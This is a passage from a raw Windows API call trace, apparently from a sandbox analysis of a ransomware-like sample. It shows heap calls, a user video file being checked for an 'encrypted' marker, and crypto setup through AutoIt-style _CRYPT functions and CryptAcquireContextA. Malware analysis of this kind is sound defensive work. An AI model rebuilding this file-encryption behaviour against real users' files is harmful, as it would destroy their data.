Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0041.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0041.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0041.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0041.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0041.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0041.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0041.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.929] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.929] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.929] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.929] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.929] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.929] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.929] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.929] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="24Ya.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0041.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0041.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0041.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0041.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c20c0 [0041.929] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0041.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0041.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0041.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5e8 [0041.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0041.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4a8 [0041.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0041.930] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0041.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0041.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af7c8 [0041.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0041.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0041.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0041.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca00 [0041.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0041.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0041.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0041.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.930] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.930] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.930] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.930] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0041.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0041.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0041.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0041.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.931] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726f64d0, ftCreationTime.dwHighDateTime=0x1d5c1d7, ftLastAccessTime.dwLowDateTime=0xc0080c50, ftLastAccessTime.dwHighDateTime=0x1d5bb48, ftLastWriteTime.dwLowDateTime=0xc0080c50, ftLastWriteTime.dwHighDateTime=0x1d5bb48, nFileSizeHigh=0x0, nFileSizeLow=0x109f6, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="S24Ya.flv", cAlternateFileName="")) returned 0x7c2100 [0041.931] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0041.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0041.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0041.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0041.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0041.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0041.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0041.931] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0041.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0041.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889aa8 [0041.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0041.932] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0041.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897f0 [0041.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.932] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0041.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0041.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0041.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0041.932] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0041.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0041.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0041.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0041.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0041.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0041.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0041.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0041.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0041.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0041.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.933] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88caf0 [0041.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.933] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0041.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0041.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0041.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0041.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0041.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0041.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0041.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.934] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0041.935] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0041.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0041.935] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0041.935] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0041.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.935] HeapFree (in: 